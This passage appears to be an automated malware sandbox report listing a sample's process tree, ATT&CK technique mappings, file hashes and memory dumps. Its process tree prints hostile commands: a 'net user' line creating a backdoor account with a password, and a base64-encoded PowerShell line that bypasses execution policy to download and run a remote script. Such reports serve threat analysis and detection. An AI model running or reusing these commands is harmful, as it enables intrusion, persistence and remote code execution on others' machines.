- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc DiSWfQR2
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc DiSWfQR2
    3⤵
    PID:1892

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  PID:1416

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3088
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:2452

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2192
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:3216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:2156

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5i4rqtwe\5i4rqtwe.dll

MD5
c9325fe637b74ff297fec9c81e396db4

SHA1
69b25a94cdca9ffd72c1f4fb8f3475327fd5090f

SHA256
c8419814d986af79123904ad026405fc47e080c4cf622734873c11293e50c226

SHA512
daab88fa9640f1b86283610fb6c9182bcb5624f03d8f47f0a0780efe33ebf9b95cddd046b02c52317f2097379ad510bda0bc7556568f2c3eb213cf6166392368

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF156.tmp

MD5
61555da39c4815bbbf3c1c6ade3fa815

SHA1
3fd2d9be7663ef3c434d40f586a9df6e8af05bce

SHA256
b4d70262fee68d0ea648265206d085db40b0e8cfa351ab00707cc79488c8b8a9

SHA512
27ce970f4a7198aa3b28151a947ec0a3a87f93779c9ec499ee6c6948d4ba3ace95048ddf771df529e87761a8188f7faab55c695911ae7a8697fe589e88bac34e

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5
f783019c5dc4a5477d1ffd4f9f512979

SHA1
37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b

SHA256
4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348

SHA512
64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5i4rqtwe\5i4rqtwe.0.cs

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5i4rqtwe\5i4rqtwe.cmdline

MD5
497097f07c4fbe00ee129097293dd521

SHA1
152a9bfa1061c9474d8f4619bc8c5a74d2761cbf

SHA256
403511dd0fe61730599111201372929302b3e058e51872d17bbe229c8596b613

SHA512
ce8234824dce8e09c3cb3935f75ce1271409fa40c1aa901d32611f5cac8ae16aecc5f0953c2e5f85eec234619090f67ca4a608a18454090e365012bbe35f46a7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5i4rqtwe\CSCA946B6C0DD3A414192C88BB2A31EE185.TMP

MD5
5630cdc9468041dba7e5a3e6eeeb2bd6

SHA1
a9e6e6639ffdc253871e0a3b40e0401a2cc71abd

SHA256
31437f3f38bd3f2fd8936e72d36e5ed1e5b01b361b13f833b45f01a1a5c8d5ea

SHA512
81a2e5266a870465995693d00f74be4c54756eba98ad1ab260686b318a339344e7ad1a6e295fe16cac126066b4289b066d023bc0af447ad943557a35b11fdc8b

Download Submit
\Windows\Branding\mediasrv.png

MD5
ac13d804585a74dc542db4ec94da39df

SHA1
8642ae2e04e492700caf41b43de9ef9d8b3c26f9

SHA256
84c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55

SHA512
0ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf

Download Submit
\Windows\Branding\mediasvc.png

MD5
9151c95451abb048a44f98d0afac8264

SHA1
22f447b210eb25c11be5a9c31f254f5f2bd50a78

SHA256
8082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518

SHA512
728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13

Download Submit
memory/64-450-0x0000000000000000-mapping.dmp

Download
memory/448-358-0x0000000000000000-mapping.dmp

Download
memory/508-362-0x0000000000000000-mapping.dmp

Download
memory/684-350-0x0000000000000000-mapping.dmp

Download
memory/688-142-0x0000000000000000-mapping.dmp

Download
memory/776-284-0x000001C7C78E0000-0x000001C7C78E2000-memory.dmp

Filesize
8KB

Download
memory/776-286-0x000001C7C78E6000-0x000001C7C78E8000-memory.dmp

Filesize
8KB

Download
memory/776-285-0x000001C7C78E3000-0x000001C7C78E5000-memory.dmp

Filesize
8KB

Download
memory/776-244-0x0000000000000000-mapping.dmp

Download
memory/1068-355-0x0000000000000000-mapping.dmp

Download
memory/1356-361-0x0000000000000000-mapping.dmp

Download
memory/1416-367-0x0000000000000000-mapping.dmp

Download
memory/1624-363-0x0000000000000000-mapping.dmp

Download
memory/1852-348-0x0000000000000000-mapping.dmp

Download
memory/1892-366-0x0000000000000000-mapping.dmp

Download
memory/2028-302-0x0000000000000000-mapping.dmp

Download
memory/2096-357-0x0000000000000000-mapping.dmp

Download
memory/2096-136-0x0000000000000000-mapping.dmp

Download
memory/2156-370-0x0000000000000000-mapping.dmp

Download
memory/2156-379-0x000001DD6E750000-0x000001DD6E752000-memory.dmp

Filesize
8KB

Download
memory/2156-381-0x000001DD6E753000-0x000001DD6E755000-memory.dmp

Filesize
8KB

Download
memory/2156-386-0x000001DD6E756000-0x000001DD6E758000-memory.dmp

Filesize
8KB

Download
memory/2156-437-0x000001DD6E758000-0x000001DD6E759000-memory.dmp

Filesize
4KB

Download
memory/2184-356-0x0000000000000000-mapping.dmp

Download
memory/2196-347-0x0000000000000000-mapping.dmp

Download
memory/2220-346-0x0000000000000000-mapping.dmp

Download
memory/2308-304-0x0000000000000000-mapping.dmp

Download
memory/2388-365-0x0000000000000000-mapping.dmp

Download
memory/2392-164-0x000002940A440000-0x000002940A442000-memory.dmp

Filesize
8KB

Download
memory/2392-174-0x000002940A440000-0x000002940A442000-memory.dmp

Filesize
8KB

Download
memory/2392-168-0x000002940A440000-0x000002940A442000-memory.dmp

Filesize
8KB

Download
memory/2392-169-0x000002940A440000-0x000002940A442000-memory.dmp

Filesize
8KB

Download
memory/2392-170-0x00000294242C0000-0x00000294242C2000-memory.dmp

Filesize
8KB

Download
memory/2392-171-0x00000294242C3000-0x00000294242C5000-memory.dmp

Filesize
8KB

Download
memory/2392-172-0x000002940A440000-0x000002940A442000-memory.dmp

Filesize
8KB

Download
memory/2392-163-0x000002940A440000-0x000002940A442000-memory.dmp

Filesize
8KB

Download
memory/2392-196-0x00000294242C6000-0x00000294242C8000-memory.dmp

Filesize
8KB

Download
memory/2392-162-0x0000000000000000-mapping.dmp

Download
memory/2392-215-0x00000294242C8000-0x00000294242CA000-memory.dmp

Filesize
8KB

Download
memory/2392-165-0x000002940A440000-0x000002940A442000-memory.dmp

Filesize
8KB

Download
memory/2392-166-0x000002940A440000-0x000002940A442000-memory.dmp

Filesize
8KB

Download
memory/2452-368-0x0000000000000000-mapping.dmp

Download
memory/2952-451-0x0000000000000000-mapping.dmp

Download
memory/3032-360-0x0000000000000000-mapping.dmp

Download
memory/3216-342-0x0000000000000000-mapping.dmp

Download
memory/3216-369-0x0000000000000000-mapping.dmp

Download
memory/3220-351-0x0000000000000000-mapping.dmp

Download
memory/3344-364-0x0000000000000000-mapping.dmp

Download
memory/3648-352-0x0000000000000000-mapping.dmp

Download
memory/3788-152-0x0000021C79B70000-0x0000021C79B71000-memory.dmp

Filesize
4KB

Download
memory/3788-132-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3788-155-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3788-126-0x0000021C78AF0000-0x0000021C78AF1000-memory.dmp

Filesize
4KB

Download
memory/3788-154-0x0000021C789E8000-0x0000021C789E9000-memory.dmp

Filesize
4KB

Download
memory/3788-153-0x0000021C79F00000-0x0000021C79F01000-memory.dmp

Filesize
4KB

Download
memory/3788-127-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3788-128-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3788-129-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3788-156-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3788-130-0x0000021C79640000-0x0000021C79641000-memory.dmp

Filesize
4KB

Download
memory/3788-124-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3788-123-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3788-146-0x0000021C78B40000-0x0000021C78B41000-memory.dmp

Filesize
4KB

Download
memory/3788-138-0x0000021C789E0000-0x0000021C789E2000-memory.dmp

Filesize
8KB

Download
memory/3788-125-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3788-121-0x0000000000000000-mapping.dmp

Download
memory/3788-139-0x0000021C789E3000-0x0000021C789E5000-memory.dmp

Filesize
8KB

Download
memory/3788-140-0x0000021C789E6000-0x0000021C789E8000-memory.dmp

Filesize
8KB

Download
memory/3788-122-0x0000021C5EBF0000-0x0000021C5EBF2000-memory.dmp

Filesize
8KB

Download
memory/3796-118-0x000001FBCEA83000-0x000001FBCEA85000-memory.dmp

Filesize
8KB

Download
memory/3796-120-0x000001FBCEA86000-0x000001FBCEA87000-memory.dmp

Filesize
4KB

Download
memory/3796-119-0x000001FBCEA85000-0x000001FBCEA86000-memory.dmp

Filesize
4KB

Download
memory/3796-115-0x000001FBCEEA0000-0x000001FBCF29F000-memory.dmp

Filesize
4.0MB

Download
memory/3796-117-0x000001FBCEA80000-0x000001FBCEA82000-memory.dmp

Filesize
8KB

Download
memory/3832-341-0x0000000000000000-mapping.dmp

Download
memory/3876-349-0x0000000000000000-mapping.dmp

Download
memory/3940-345-0x0000000000000000-mapping.dmp

Download
memory/3948-359-0x0000000000000000-mapping.dmp

Download
memory/3988-217-0x000001E1788D3000-0x000001E1788D5000-memory.dmp

Filesize
8KB

Download
memory/3988-250-0x000001E1788D8000-0x000001E1788DA000-memory.dmp

Filesize
8KB

Download
memory/3988-216-0x000001E1788D0000-0x000001E1788D2000-memory.dmp

Filesize
8KB

Download
memory/3988-249-0x000001E1788D6000-0x000001E1788D8000-memory.dmp

Filesize
8KB

Download
memory/3988-203-0x0000000000000000-mapping.dmp

Download
memory/4020-303-0x0000000000000000-mapping.dmp

Download